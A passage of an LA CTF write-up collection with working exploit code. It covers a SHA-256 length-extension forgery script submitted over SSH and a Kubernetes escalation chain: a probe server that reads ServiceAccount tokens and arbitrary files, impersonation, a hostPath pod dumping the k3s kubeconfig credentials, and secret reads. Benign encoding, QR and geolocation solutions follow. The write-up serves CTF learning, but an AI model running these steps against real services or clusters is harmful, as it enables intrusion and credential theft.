def _ssig0(x):
    return _rotr(x, 7) ^ _rotr(x, 18) ^ (x >> 3)


def _ssig1(x):
    return _rotr(x, 17) ^ _rotr(x, 19) ^ (x >> 10)


def sha256_glue_padding(msg_len_bytes):
    # Standard SHA-256 padding for a message of length msg_len_bytes.
    ml_bits = msg_len_bytes * 8
    pad = b"\x80"
    # pad with zeros until length ≡ 56 (mod 64)
    pad += b"\x00" * ((56 - (msg_len_bytes + 1) % 64) % 64)
    pad += struct.pack(">Q", ml_bits)
    return pad


def sha256_compress(state, block64):
    w = list(struct.unpack(">16I", block64)) + [0] * 48
    for i in range(16, 64):
        w[i] = (w[i - 16] + _ssig0(w[i - 15]) + w[i - 7] + _ssig1(w[i - 2])) & 0xFFFFFFFF

    a, b, c, d, e, f, g, h = state
    for i in range(64):
        t1 = (h + _bsig1(e) + _ch(e, f, g) + K[i] + w[i]) & 0xFFFFFFFF
        t2 = (_bsig0(a) + _maj(a, b, c)) & 0xFFFFFFFF
        h = g
        g = f
        f = e
        e = (d + t1) & 0xFFFFFFFF
        d = c
        c = b
        b = a
        a = (t1 + t2) & 0xFFFFFFFF

    return [
        (state[0] + a) & 0xFFFFFFFF,
        (state[1] + b) & 0xFFFFFFFF,
        (state[2] + c) & 0xFFFFFFFF,
        (state[3] + d) & 0xFFFFFFFF,
        (state[4] + e) & 0xFFFFFFFF,
        (state[5] + f) & 0xFFFFFFFF,
        (state[6] + g) & 0xFFFFFFFF,
        (state[7] + h) & 0xFFFFFFFF,
    ]


def sha256_continue_from_digest(digest_hex, extra, total_prehashed_len_bytes):
    # Continue SHA-256 from an existing digest (internal state), assuming
    # total_prehashed_len_bytes bytes have already been hashed.
    state = list(struct.unpack(">8I", bytes.fromhex(digest_hex)))
    msg = extra + sha256_glue_padding(total_prehashed_len_bytes + len(extra))
    for off in range(0, len(msg), 64):
        state = sha256_compress(state, msg[off : off + 64])
    return struct.pack(">8I", *state).hex()


def forge_from_export(export_save_b64, export_checksum_hex, *, secret_len=40):
    # We export with empty username, so the MAC is sha256((SECRET + save).strip()).
    save = base64.b64decode(export_save_b64)
    m = save.rstrip(WHITESPACE)

    pad1 = sha256_glue_padding(secret_len + len(m))
    if len(m) + len(pad1) > 32:
        raise RuntimeError(
            f"Need shorter stripped export: len(m)={len(m)} pad={len(pad1)} total={len(m)+len(pad1)} > 32"
        )

    ext = build_winning_save_bytes()

    # Server will hash: SECRET || (m||pad1) || ext, then .strip() (our ext ends with 'X', so no trimming).
    forged_username = m + pad1
    forged_save = ext
    total_prehashed = secret_len + len(m) + len(pad1)
    forged_checksum_hex = sha256_continue_from_digest(export_checksum_hex, ext, total_prehashed)

    return forged_username, base64.b64encode(forged_save), forged_checksum_hex.encode()


def import_and_print_flag(username_bytes, save_b64_bytes, checksum_hex_bytes):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(
        HOST,
        port=PORT,
        username=SSH_USER,
        password=SSH_PASS,
        look_for_keys=False,
        allow_agent=False,
    )

    chan = client.get_transport().open_session()
    chan.get_pty(term="xterm-256color", width=120, height=40)
    chan.invoke_shell()
    chan.settimeout(2.0)

    def recv_all_until_quiet(quiet_seconds=0.6, hard_timeout=10.0):
        buf = b""
        start = time.time()
        last = time.time()
        while True:
            now = time.time()
            if now - start > hard_timeout:
                break
            if chan.recv_ready():
                chunk = chan.recv(65535)
                if not chunk:
                    break
                buf += chunk
                last = now
            else:
                if now - last >= quiet_seconds:
                    break
                time.sleep(0.05)
        return buf

    time.sleep(0.2)
    _ = recv_all_until_quiet(quiet_seconds=0.2, hard_timeout=1.0)

    chan.sendall(username_bytes + b"\n")
    chan.sendall(save_b64_bytes + b"\n")
    chan.sendall(checksum_hex_bytes + b"\n")

    out = recv_all_until_quiet(quiet_seconds=0.8, hard_timeout=12.0)
    m = re.search(br"lactf\{[^}\n]+\}", out, flags=re.IGNORECASE)
    if not m:
        sys.stdout.buffer.write(out)
        sys.stdout.buffer.flush()
        raise RuntimeError("flag not found in output")
    print(m.group(0).decode("ascii", errors="ignore"))

    chan.close()
    client.close()


def main():
    if len(sys.argv) != 3:
        print(f"Usage: {sys.argv[0]} <export_save_b64> <export_checksum_hex>")
        print("Tip: export with empty username, and aim for an empty board so the stripped export is short.")
        return 2

    export_save_b64 = sys.argv[1].encode()
    export_checksum_hex = sys.argv[2].strip()
    username, save_b64, checksum = forge_from_export(export_save_b64, export_checksum_hex)
    import_and_print_flag(username, save_b64, checksum)
    return 0


if __name__ == "__main__":
    raise SystemExit(main())
```

Flag: `lactf{T3rM1n4L_g4mE5_R_a_Pa1N_2e075ab9ae6ae098}`

***

## misc

### CTFaaS - CTFs as a Service!

#### Description

We are given access to a “CTF Challenge Deployer” web UI on a provisioned VM. It accepts a Docker image tarball and exposes a chosen container port via a NodePort. The challenge claims a “Secret in the cluster” contains the company keys (flag), and that sandboxing/RBAC prevents malicious actions.

#### Solution

The core issue is that uploaded images run as pods inside the Kubernetes cluster with a ServiceAccount token. That token can *impersonate* the deployer’s ServiceAccount (`ctf-deployer-sa`). As `ctf-deployer-sa`, we can create pods in `default` and mount a `hostPath` to `/`, which lets us read host files. On k3s, `/etc/rancher/k3s/k3s.yaml` is a kubeconfig containing a client certificate+key that has high privileges. Using those credentials against the apiserver, we can directly read the secret in the hidden namespace and recover the flag.

Steps (commands shown for the instance VM IP `35.219.138.219`):

1. Deploy a probe container so we can read the in-pod ServiceAccount token and talk to the apiserver from inside the cluster.

Probe image code (Dockerfile + server):

```dockerfile
FROM python:3.11-slim

RUN useradd -m app
WORKDIR /app
COPY server.py /app/server.py

USER app
ENV PYTHONUNBUFFERED=1
EXPOSE 8000
CMD ["python", "/app/server.py"]
```

```python
#!/usr/bin/env python3
import base64
import concurrent.futures
import http.client
import json
import os
import socket
import ssl
import sys
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

SA_DIR = "/var/run/secrets/kubernetes.io/serviceaccount"
TOKEN_PATH = os.path.join(SA_DIR, "token")
CA_PATH = os.path.join(SA_DIR, "ca.crt")
NS_PATH = os.path.join(SA_DIR, "namespace")

API = os.environ.get("KUBE_API", "https://kubernetes.default.svc")


def _read(path, default=""):
    try:
        with open(path, "r", encoding="utf-8") as f:
            return f.read().strip()
    except Exception:
        return default


def _default_gw() -> str:
    try:
        with open("/proc/net/route", "r", encoding="utf-8") as f:
            for line in f.read().splitlines()[1:]:
                parts = line.split()
                if len(parts) < 3:
                    continue
                dest, gw = parts[1], parts[2]
                if dest != "00000000":
                    continue
                b = bytes.fromhex(gw)
                ip = ".".join(str(x) for x in b[::-1])
                if ip:
                    return ip
    except Exception:
        pass
    return ""


def tcp_connect(host: str, port: int, timeout: float = 1.0) -> dict:
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return {"ok": True}
    except Exception as e:
        return {"ok": False, "error": str(e)}


def tcp_exchange(host: str, port: int, send: bytes = b"", timeout: float = 1.0, recv_bytes: int = 4096) -> dict:
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            if send:
                s.sendall(send)
            try:
                data = s.recv(recv_bytes)
            except socket.timeout:
                data = b""
            return {"ok": True, "recv_b64": base64.b64encode(data).decode(), "recv_len": len(data)}
    except Exception as e:
        return {"ok": False, "error": str(e)}


def http_fetch(url: str, timeout: float = 5.0, insecure: bool = False, headers: dict | None = None, max_bytes: int = 64 * 1024) -> dict:
    if not (url.startswith("http://") or url.startswith("https://")):
        return {"ok": False, "error": "only http(s) supported"}
    req = urllib.request.Request(url, method="GET")
    for k, v in (headers or {}).items():
        req.add_header(k, v)
    ctx = None
    if url.startswith("https://"):
        ctx = ssl._create_unverified_context() if insecure else ssl.create_default_context()
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            body = resp.read(max_bytes)
            return {
                "ok": True,
                "status": resp.status,
                "headers": dict(resp.headers),
                "body_b64": base64.b64encode(body).decode(),
                "body_truncated": resp.length is not None and resp.length > max_bytes,
                "url": resp.geturl(),
            }
    except Exception as e:
        return {"ok": False, "error": str(e)}


def k8s_request(method, path, body=None, headers=None):
    token = _read(TOKEN_PATH)
    if not token:
        raise RuntimeError("No serviceaccount token mounted")

    url = API.rstrip("/") + path
    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")

    req = urllib.request.Request(url, method=method)
    req.add_header("Authorization", "Bearer " + token)
    req.add_header("Accept", "application/json")
    if data is not None:
        req.add_header("Content-Type", "application/json")
    if headers:
        for k, v in headers.items():
            req.add_header(k, v)

    ctx = ssl.create_default_context(cafile=CA_PATH if os.path.exists(CA_PATH) else None)
    try:
        with urllib.request.urlopen(req, data=data, context=ctx, timeout=10) as resp:
            raw = resp.read()
            ctype = resp.headers.get("content-type", "")
            return resp.status, ctype, raw
    except urllib.error.HTTPError as e:
        raw = e.read()
        return e.code, e.headers.get("content-type", ""), raw


def k8s_request_dupheaders(method, path, body=None, header_items=None):
    token = _read(TOKEN_PATH)
    if not token:
        raise RuntimeError("No serviceaccount token mounted")

    api = urllib.parse.urlparse(API)
    host = api.hostname or "kubernetes.default.svc"
    port = api.port or (443 if api.scheme == "https" else 80)

    data = None
    if body is not None:
        data = json.dumps(body).encode("utf-8")

    ctx = ssl.create_default_context(cafile=CA_PATH if os.path.exists(CA_PATH) else None)
    conn_cls = http.client.HTTPSConnection if api.scheme == "https" else http.client.HTTPConnection
    conn = conn_cls(host, port, timeout=10, context=ctx if api.scheme == "https" else None)
    try:
        conn.putrequest(method, path)
        base = [
            ("Authorization", "Bearer " + token),
            ("Accept", "application/json"),
        ]
        if data is not None:
            base.append(("Content-Type", "application/json"))
        for k, v in base:
            conn.putheader(k, v)
        for k, v in (header_items or []):
            conn.putheader(k, v)
        conn.endheaders()
        if data is not None:
            conn.send(data)
        resp = conn.getresponse()
        raw = resp.read()
        ctype = resp.getheader("content-type", "")
        return resp.status, ctype, raw
    finally:
        conn.close()


def k8s_get_json(path):
    st, ctype, raw = k8s_request("GET", path)
    try:
        return st, json.loads(raw.decode("utf-8", errors="replace"))
    except Exception:
        return st, {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}


def k8s_post_json(path, body):
    st, ctype, raw = k8s_request("POST", path, body=body)
    try:
        return st, json.loads(raw.decode("utf-8", errors="replace"))
    except Exception:
        return st, {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}


class Handler(BaseHTTPRequestHandler):
    def _send(self, code, body, ctype="application/json"):
        if isinstance(body, (dict, list)):
            raw = json.dumps(body, indent=2, sort_keys=True).encode("utf-8")
        elif isinstance(body, (bytes, bytearray)):
            raw = bytes(body)
        else:
            raw = str(body).encode("utf-8")
        self.send_response(code)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(raw)))
        self.end_headers()
        self.wfile.write(raw)

    def do_GET(self):
        if self.path == "/" or self.path.startswith("/?"):
            info = {
                "pod": os.environ.get("HOSTNAME"),
                "namespace": _read(NS_PATH, "unknown"),
                "has_sa_token": os.path.exists(TOKEN_PATH),
                "kube_api": API,
                "kube_host_env": os.environ.get("KUBERNETES_SERVICE_HOST"),
                "pod_ip": (_read("/etc/hosts").splitlines()[-1].split()[0] if _read("/etc/hosts") else None),
                "default_gw": _default_gw() or None,
            }
            self._send(200, info)
            return

        if self.path.startswith("/read"):
            q = urllib.parse.urlparse(self.path).query
            params = urllib.parse.parse_qs(q)
            p = params.get("path", [""])[0]
            if not p or not p.startswith("/"):
                self._send(400, {"error": "path must be absolute"})
                return
            try:
                with open(p, "rb") as f:
                    raw = f.read(64 * 1024)
            except Exception as e:
                self._send(500, {"error": str(e)})
                return
            self._send(200, raw, ctype="text/plain; charset=utf-8")
            return

        if self.path.startswith("/k8s-imp"):
            q = urllib.parse.urlparse(self.path).query
            params = urllib.parse.parse_qs(q)
            p = params.get("path", [""])[0]
            sa = params.get("sa", ["ctf-deployer-sa"])[0]
            ns = params.get("ns", [_read(NS_PATH, "default")])[0]
            if not p.startswith("/"):
                self._send(400, {"error": "path must start with /"})
                return
            user = f"system:serviceaccount:{ns}:{sa}"
            hdr_items = [("Impersonate-User", user)]
            st, ctype, raw = k8s_request_dupheaders("GET", p, header_items=hdr_items)
            try:
                obj = json.loads(raw.decode("utf-8", errors="replace"))
            except Exception:
                obj = {"_raw": raw.decode("utf-8", errors="replace"), "_content_type": ctype}
            self._send(st, obj)
            return

        self._send(404, {"error": "not found"})

    def do_POST(self):
        if self.path.startswith("/ssrr"):
            ns = _read(NS_PATH, "default")
            st, obj = k8s_post_json(
                "/apis/authorization.k8s.io/v1/selfsubjectrulesreviews",
                {"apiVersion": "authorization.k8s.io/v1", "kind": "SelfSubjectRulesReview", "spec": {"namespace": ns}},
            )
            self._send(st, obj)
            return
        self._send(404, {"error": "not found"})

    def log_message(self, fmt, *args):
        sys.stderr.write("%s - - [%s] %s\n" % (self.client_address[0], self.log_date_time_string(), fmt % args))


def main():
    port = int(os.environ.get("PORT", "8000"))
    httpd = HTTPServer(("0.0.0.0", port), Handler)
    print(f"listening on :{port}", flush=True)
    httpd.serve_forever()


if __name__ == "__main__":
    main()
```

Deploy it via the web UI (or with curl), then note the resulting NodePort URL (example: `http://35.219.138.219:32483/`). From that URL, read the in-pod token:

```bash
PROBE=http://35.219.138.219:32483
TOKEN="$(curl -sS "$PROBE/read?path=/var/run/secrets/kubernetes.io/serviceaccount/token")"
```

2. Confirm the interesting permission: `ctf-app` can impersonate `ctf-deployer-sa`:

```bash
curl -sS -k -H "Authorization: Bearer $TOKEN" \
  https://35.219.138.219:6443/apis/authorization.k8s.io/v1/selfsubjectrulesreviews \
  -H 'Content-Type: application/json' \
  --data '{"apiVersion":"authorization.k8s.io/v1","kind":"SelfSubjectRulesReview","spec":{"namespace":"default"}}'
```

3. Use that to create a pod *as* `ctf-deployer-sa` with a `hostPath` mount of `/` and read the host’s k3s kubeconfig (`/etc/rancher/k3s/k3s.yaml`). This file contains `client-certificate-data` and `client-key-data`.

```bash
cat > pod.json <<'JSON'
{
  "apiVersion": "v1",
  "kind": "Pod",
  "metadata": { "name": "dumpkube" },
  "spec": {
    "restartPolicy": "Never",
    "containers": [{
      "name": "c",
      "image": "10.43.254.254:5000/challenge-<your_challenge_id>:latest",
      "command": ["sh","-c","cat /host/etc/rancher/k3s/k3s.yaml"],
      "volumeMounts": [{ "name": "host", "mountPath": "/host", "readOnly": true }]
    }],
    "volumes": [{ "name": "host", "hostPath": { "path": "/", "type": "Directory" } }]
  }
}
JSON

curl -sS -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:serviceaccount:default:ctf-deployer-sa" \
  -H 'Content-Type: application/json' \
  --data @pod.json \
  https://35.219.138.219:6443/api/v1/namespaces/default/pods

curl -sS -k -H "Authorization: Bearer $TOKEN" \
  -H "Impersonate-User: system:serviceaccount:default:ctf-deployer-sa" \
  'https://35.219.138.219:6443/api/v1/namespaces/default/pods/dumpkube/log' > k3s.yaml
```

4. Extract the client cert/key from `k3s.yaml` and use them to access the hidden namespace and read the secret:

```bash
python3 - <<'PY'
import base64, re, pathlib
s = pathlib.Path("k3s.yaml").read_text()
def grab(k):
  m = re.search(rf"{k}:\\s*([A-Za-z0-9+/=]+)", s)
  return base64.b64decode(m.group(1))
pathlib.Path("client.crt").write_bytes(grab("client-certificate-data"))
pathlib.Path("client.key").write_bytes(grab("client-key-data"))
PY

curl -sS -k --cert client.crt --key client.key \
  https://35.219.138.219:6443/api/v1/namespaces/hidden-vault/secrets | jq -r '.items[].metadata.name'

curl -sS -k --cert client.crt --key client.key \
  https://35.219.138.219:6443/api/v1/namespaces/hidden-vault/secrets/real-flag \
  | jq -r '.data.flag' | base64 -d
```

This outputs the flag:

```
lactf{0h_n0_y0u_h4ck3d_my_p34f3c7ly_s3cur3_c7us73r}
```

### cat\_bomb

#### Description

Given an image, determine the location shown to recover the flag.

#### Solution

Reverse image search the provided image and follow the results until you can identify the exact spot. Then view it manually in Google Maps to confirm the location.

The reverse image search result points to **Fushimi Inari Taisha** shrine in Kyoto, Japan.

Flag: `lactf{34.9681588,135.7772502}`

### endians

#### Description

I was reading about Unicode character encodings until one day, my flag turned into Japanese! Does little-endian mean the little byte's at the end or that the characters start with the little byte?

Files: `chall.txt`, `gen.py`

#### Solution

The provided `attachments/gen.py` shows the flag was turned into "Japanese" by encoding/decoding with opposite UTF-16 endianness:

```python
text = "lactf{REDACTED}"
endian = text.encode(encoding="???").decode(encoding="???")
with open("chall.txt", "wb") as file:
    file.write(endian.encode())
```

In `attachments/chall.txt`, each displayed CJK character is actually a single Unicode code point whose bytes look like `0xXX 0x00` (ASCII byte as the high byte, `0x00` as the low byte). That happens when UTF-16-LE bytes like `6c 00` (for `'l'`) are mis-decoded as UTF-16-BE, producing `U+6C00` (`氀`).

So the forward transform is:

* `encode("utf-16-le")` then `decode("utf-16-be")`

To reverse it, do the opposite:

* `encode("utf-16-be")` then `decode("utf-16-le")`

```python
from pathlib import Path

data = Path("attachments/chall.txt").read_text(encoding="utf-8").strip()
print(data.encode("utf-16-be").decode("utf-16-le"))
```

Flag: `lactf{1_sur3_h0pe_th1s_d0es_n0t_g3t_l0st_1n_translati0n!}`

### error-correction

#### Description

We are given `chall.png`, a scrambled QR code (version 7, 45x45 modules, no border). The challenge script (`attachments/chall.py`) shows it was made by:

1. Generating a QR for the flag (`segno.make(..., mode='byte', error='L', boost_error=False, version=7)`).
2. Splitting the 45x45 module image into a 5x5 grid of 9x9 chunks (25 total).
3. Randomly shuffling the chunks and reassembling into a scrambled QR image.

Goal: recover the original chunk permutation and decode the QR to get the flag.

#### Solution

Phase 1 (already reflected in `progress.md`) uses QR *function patterns* (finders, timing, alignments, version info) to place 13 of 25 chunks uniquely.

The remaining 12 chunks lie entirely in the data area, so structural matching alone is insufficient.

Key trick to finish:

* For a fixed QR configuration (v7, EC=L, mask pattern), and a fixed *payload length* `nbytes`, many of the *placed codewords* are **invariant** across different payload contents of that same length (they correspond to padding-only regions and their Reed-Solomon EC).
* We can discover these invariant codewords empirically by generating a few random payloads of length `nbytes` with `segno`, extracting the raw (unmasked) placed codewords from the generated matrices, and taking the positions that are identical across all samples.
* Those invariant codewords imply exact expected module colors at many matrix coordinates. That creates strong per-position constraints, which lets us solve the remaining chunk permutation via backtracking.
* The only unknown is the payload length, so we iterate `nbytes` until reconstruction yields a decodable `lactf{...}`.

Running the solver prints the decoded flag and writes the reconstructed QR to `/tmp/qr_solve_solved.png`.

Solution code:

```python
#!/usr/bin/env python3
"""
Solve: error-correction (LA CTF)

The QR (v7, EC=L) was split into 25 (9x9) chunks, shuffled, and reassembled.

Phase 1 (already done in progress.md) identifies 13 chunk placements using
function-pattern (structural) constraints.

Phase 2 (this script) uses a stronger constraint:
For v7-L with a fixed payload length, many placed codewords are deterministic
padding/EC and therefore invariant across different payload contents.
"""

from __future__ import annotations

import os
from typing import Dict, List, Tuple

import numpy as np
from PIL import Image
import segno

SIZE = 45
CHUNK = 9

HERE = os.path.dirname(os.path.abspath(__file__))
ATTACH = os.path.join(HERE, "attachments")
CHALL_PNG = os.path.join(ATTACH, "chall.png")


def load_chunks() -> List[np.ndarray]:
    img = Image.open(CHALL_PNG).convert("L")
    small = img.resize((SIZE, SIZE), Image.Resampling.NEAREST)
    arr = np.array(small, dtype=np.uint8)
    out: List[np.ndarray] = []
    for cy in range(5):
        for cx in range(5):
            out.append(arr[CHUNK * cy : CHUNK * (cy + 1), CHUNK * cx : CHUNK * (cx + 1)].copy())
    assert len(out) == 25
    return out


def dark(pixel: int) -> int:
    # chall.png uses 0 for black, 255 for white.
    return 1 if pixel == 0 else 0


def mask_func(r: int, c: int, pattern: int) -> bool:
    if pattern == 0:
        return (r + c) % 2 == 0
    if pattern == 1:
        return r % 2 == 0
    if pattern == 2:
        return c % 3 == 0
    if pattern == 3:
        return (r + c) % 3 == 0
    if pattern == 4:
        return (r // 2 + c // 3) % 2 == 0
    if pattern == 5:
        return ((r * c) % 2 + (r * c) % 3) == 0
    if pattern == 6:
        return (((r * c) % 2 + (r * c) % 3) % 2) == 0
    if pattern == 7:
        return (((r + c) % 2 + (r * c) % 3) % 2) == 0
    raise ValueError("bad mask pattern")


def read_format_info_from_tl_chunk(chunk_tl: np.ndarray) -> Tuple[str, int]:
    """
    Read format info from the (top-left) finder block region.

    Returns (ec_level_name, mask_pattern).
    """
    bits_raw: List[int] = []

    # Copy 1 around top-left finder:
    # row 8: cols 0-5
    for c in range(6):
        bits_raw.append(dark(int(chunk_tl[8, c])))
    # row 8: col 7 (skip col 6 timing)
    bits_raw.append(dark(int(chunk_tl[8, 7])))
    # row 8: col 8
    bits_raw.append(dark(int(chunk_tl[8, 8])))
    # col 8: rows 7,5,4,3,2,1,0 (skip row 6 timing)
    for r in [7, 5, 4, 3, 2, 1, 0]:
        bits_raw.append(dark(int(chunk_tl[r, 8])))

    # Unmask (XOR) with 0b101010000010010
    fmt_mask = [1, 0, 1, 0, 1, 0, 0, 0, 0, 0, 1, 0, 0, 1, 0]
    bits = [a ^ b for a, b in zip(bits_raw, fmt_mask)]

    ec_level = bits[0] * 2 + bits[1]
    mask_pattern = bits[2] * 4 + bits[3] * 2 + bits[4]

    ec_names = {0: "M", 1: "L", 2: "H", 3: "Q"}
    return ec_names.get(ec_level, "?"), mask_pattern


def build_function_mask_v7() -> np.ndarray:
    """
    True where modules are NOT data modules (finder/timing/alignment/version/format/etc).
    """
    m = np.zeros((SIZE, SIZE), dtype=bool)

    # Finder patterns + separators (9x9 incl. separator)
    m[0:9, 0:9] = True
    m[0:9, SIZE - 8 : SIZE] = True
    m[SIZE - 8 : SIZE, 0:9] = True

    # Timing patterns
    m[6, 8 : SIZE - 8] = True
    m[8 : SIZE - 8, 6] = True

    # Alignment patterns (v7: centers at 6, 22, 38)
    for ar in [6, 22, 38]:
        for ac in [6, 22, 38]:
            if ar <= 8 and ac <= 8:
                continue
            if ar <= 8 and ac >= SIZE - 8:
                continue
            if ar >= SIZE - 8 and ac <= 8:
                continue
            m[ar - 2 : ar + 3, ac - 2 : ac + 3] = True

    # Version info (v7+)
    m[0:6, SIZE - 11 : SIZE - 8] = True
    m[SIZE - 11 : SIZE - 8, 0:6] = True

    # Dark module (row 4*version + 9, col 8) => (37,8) for v7
    m[SIZE - 8, 8] = True

    # Format info areas (mark the common bounding parts; these positions are never data)
    m[8, 0:9] = True
    m[0:9, 8] = True
    m[8, SIZE - 8 : SIZE] = True
    m[SIZE - 8 : SIZE, 8] = True

    return m


def data_placement_order(is_function: np.ndarray) -> List[Tuple[int, int]]:
    """
    List of (r,c) for data modules in placement order (bit order).
    """
    place: List[Tuple[int, int]] = []
    col = SIZE - 1
    going_up = True
    while col > 0:
        if col == 6:
            col -= 1
        rows = range(SIZE - 1, -1, -1) if going_up else range(0, SIZE)
        for r in rows:
            for dc in (0, -1):
                c = col + dc
                if c >= 0 and not is_function[r, c]:
                    place.append((r, c))
        going_up = not going_up
        col -= 2
    return place


def extract_codewords_from_segno(payload: bytes, mask_pattern: int) -> List[int]:
    """Extract the 196 raw (unmasked) placed codewords from a segno-generated QR."""
    qr = segno.make(payload, mode="byte", error="L", boost_error=False, version=7, mask=mask_pattern)
    ref = np.array(qr.matrix, dtype=np.uint8)  # 1=dark
    assert ref.shape == (SIZE, SIZE)

    is_function = build_function_mask_v7()
    place = data_placement_order(is_function)
    assert len(place) == 196 * 8

    bits: List[int] = []
    for r, c in place:
        mod = int(ref[r, c])
        raw = mod ^ (1 if mask_func(r, c, mask_pattern) else 0)
        bits.append(raw)

    codewords: List[int] = []
    for i in range(0, len(bits), 8):
        b = 0
        for j in range(8):
            b = (b << 1) | bits[i + j]
        codewords.append(b)
    assert len(codewords) == 196
    return codewords


def invariant_codewords_for_length(nbytes: int, mask_pattern: int, samples: int = 4) -> Dict[int, int]:
    """
    For a fixed payload length, generate a few random payloads and find which
    *placed* codeword positions are invariant (same across all samples).
    """
    rng = np.random.default_rng(0xC0DEF00D)  # deterministic
    cws_samples: List[List[int]] = []
    for _ in range(samples):
        payload = bytes(int(x) for x in rng.integers(0, 256, size=nbytes, dtype=np.uint16))
        cws_samples.append(extract_codewords_from_segno(payload, mask_pattern))

    inv: Dict[int, int] = {}
    for i in range(196):
        vals = {s[i] for s in cws_samples}
        if len(vals) == 1:
            inv[i] = next(iter(vals))
    return inv


def expected_pixels_for_invariant_codewords(mask_pattern: int, inv_cw: Dict[int, int]) -> Dict[Tuple[int, int], int]:
    """Map (r,c) -> expected pixel for all bits belonging to invariant placed codewords."""
    is_function = build_function_mask_v7()
    place = data_placement_order(is_function)
    exp: Dict[Tuple[int, int], int] = {}
    for cw_idx, cw_val in inv_cw.items():
        for bit_in_cw in range(8):
            bit_idx = cw_idx * 8 + bit_in_cw
            r, c = place[bit_idx]
            raw_bit = (cw_val >> (7 - bit_in_cw)) & 1
            mod = raw_bit ^ (1 if mask_func(r, c, mask_pattern) else 0)
            exp[(r, c)] = 0 if mod == 1 else 255
    return exp


def solve_assignment(chunks: List[np.ndarray], exp: Dict[Tuple[int, int], int]) -> Dict[int, int]:
    # Known placements (position index pi = cy*5+cx -> scrambled chunk index ci)
    known: Dict[int, int] = {
        0: 24,  # (0,0)
        1: 21,  # (1,0)
        2: 10,  # (2,0)
        3: 9,  # (3,0)
        4: 15,  # (4,0)
        5: 11,  # (0,1)
        10: 0,  # (0,2)
        12: 1,  # (2,2)
        14: 7,  # (4,2)
        15: 3,  # (0,3)
        20: 5,  # (0,4)
        22: 20,  # (2,4)
        24: 19,  # (4,4)
    }

    used = set(known.values())
    remaining_chunks = [i for i in range(25) if i not in used]
    remaining_positions = [i for i in range(25) if i not in known]

    # Build per-position constraints from expected pixels
    pos_constraints: Dict[int, Dict[Tuple[int, int], int]] = {}
    for pi in remaining_positions:
        cy, cx = divmod(pi, 5)
        cons: Dict[Tuple[int, int], int] = {}
        for lr in range(CHUNK):
            for lc in range(CHUNK):
                r = cy * CHUNK + lr
                c = cx * CHUNK + lc
                v = exp.get((r, c))
                if v is not None:
                    cons[(lr, lc)] = v
        pos_constraints[pi] = cons

    # Candidate chunks for each remaining position
    candidates: Dict[int, List[int]] = {}
    for pi in remaining_positions:
        cons = pos_constraints[pi]
        cand: List[int] = []
        for ci in remaining_chunks:
            ok = True
            ch = chunks[ci]
            for (lr, lc), v in cons.items():
                if int(ch[lr, lc]) != v:
                    ok = False
                    break
            if ok:
                cand.append(ci)
        candidates[pi] = cand

    # Backtrack (MRV)
    order = sorted(remaining_positions, key=lambda p: len(candidates[p]))
    assign: Dict[int, int] = dict(known)
    used2 = set(known.values())

    def bt(idx: int) -> bool:
        if idx == len(order):
            return True
        pi = order[idx]
        for ci in candidates[pi]:
            if ci in used2:
                continue
            assign[pi] = ci
            used2.add(ci)
            if bt(idx + 1):
                return True
            used2.remove(ci)
            del assign[pi]
        return False

    if not bt(0):
        raise RuntimeError("No assignment found under constraints")
    if len(assign) != 25:
        raise RuntimeError(f"Incomplete assignment: {len(assign)}/25")
    return assign


def reconstruct_matrix(chunks: List[np.ndarray], assign: Dict[int, int]) -> np.ndarray:
    out = np.zeros((SIZE, SIZE), dtype=np.uint8)
    for pi, ci in assign.items():
        cy, cx = divmod(pi, 5)
        out[CHUNK * cy : CHUNK * (cy + 1), CHUNK * cx : CHUNK * (cx + 1)] = chunks[ci]
    return out


def decode_qr(qr_mat: np.ndarray) -> str | None:
    img = Image.fromarray(qr_mat).resize((450, 450), Image.Resampling.NEAREST)

    try:
        from pyzbar.pyzbar import decode as zdecode

        res = zdecode(img)
        if res:
            return res[0].data.decode("utf-8", errors="replace")
    except Exception:
        pass

    try:
        import cv2

        det = cv2.QRCodeDetector()
        data, _, _ = det.detectAndDecode(np.array(img))
        if data:
            return data
    except Exception:
        pass

    return None


def main() -> None:
    chunks = load_chunks()

    # Determine mask pattern from TL chunk (chunk 24 at pos (0,0))
    known_tl = 24
    chunk_tl = chunks[known_tl]
    ec_level, mask_pattern = read_format_info_from_tl_chunk(chunk_tl)
    if ec_level != "L":
        raise RuntimeError(f"Unexpected EC level: {ec_level}")

    # Search payload length by leveraging segno invariants.
    for nbytes in range(1, 160):
        try:
            inv = invariant_codewords_for_length(nbytes, mask_pattern, samples=4)
        except Exception:
            # Too long (or otherwise invalid) for v7-L.
            break

        # Need a decent number of invariants to constrain anything.
        if len(inv) < 24:
            continue

        exp = expected_pixels_for_invariant_codewords(mask_pattern, inv)
        try:
            assign = solve_assignment(chunks, exp)
        except RuntimeError:
            continue

        qr = reconstruct_matrix(chunks, assign)
        decoded = decode_qr(qr)
        if decoded and decoded.startswith("lactf{") and decoded.endswith("}"):
            out_path = "/tmp/qr_solve_solved.png"
            Image.fromarray(qr).resize((450, 450), Image.Resampling.NEAREST).save(out_path)
            print(decoded)
            return

    raise SystemExit("Failed to decode for any tested length")


if __name__ == "__main__":
    main()
```

### flag irl

#### Description

A video of a 3D printer printing a text nameplate is provided. The flag is the text being printed, which must be recovered by tracking the printer's motion.

#### Solution

The key insight is that on the **top layers** of a 3D-printed text nameplate, the print head only visits positions where the raised letters exist. By tracking the head's X position (physical X axis) and the bed's X position in the video frame (which maps to the physical Y axis due to the side-on camera angle), we can reconstruct a 2D map of the printed text.

**Step 1: Position tracking (pre-existing)**

The 1080p video (`video1080p.mp4`, 60fps, 29168 frames) had already been processed with template-matching trackers to produce:

* `pos_1080.npy` — head/nozzle (X, Y) pixel position per frame
* `bed_pos_1080.npy` — bed reference point (X, Y, confidence) per frame

The head X tracks the physical X axis (head moves left/right). The bed X tracks the physical Y axis (bed moves forward/backward, appearing as horizontal motion from the camera's oblique angle).

**Step 2: Identify the text-printing region**

